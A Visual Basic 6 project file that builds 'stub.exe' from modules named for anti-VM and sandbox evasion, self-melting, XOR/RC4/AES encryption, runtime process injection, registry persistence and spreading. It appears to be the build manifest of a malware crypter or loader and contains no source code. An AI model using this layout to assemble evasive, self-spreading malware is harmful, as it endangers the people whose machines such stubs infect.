Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation
Module=mod_anticodes; mod_anticodes.bas
Module=modVMs; modVMs.bas
Module=modCDKey; modCDKey.bas
Module=modDetExe; modDetExe.bas
Module=modSandboxes; modSandboxes.bas
Module=melt_mod; Module1.bas
Module=XOR_mod; XOR_mod.bas
Module=RC4; RC4.bas
Module=AES_mod; AES_mod.bas
Class=cRijndael; cRijndael.cls
Module=rtinjection_mod; rt_mod.bas
Module=Split_mod; Module11111111111.bas
Module=process_mod; process_mod.bas
Module=registrykeys_mod; registrykeys_mod.bas
Module=Spreader; Spreader.bas
Module=Declarations; Declarations.bas
Module=main_mod; main_mod.bas
Startup="Sub Main"
HelpFile=""
ExeName32="stub.exe"
Path32="..\.."
Command32=""
Name="tato"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
CompilationType=-1
OptimizationType=1
FavorPentiumPro(tm)=-1
CodeViewDebugInfo=0
NoAliasing=-1
BoundsCheck=-1
OverflowCheck=-1
FlPointCheck=-1
FDIVCheck=-1
UnroundedFP=-1
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
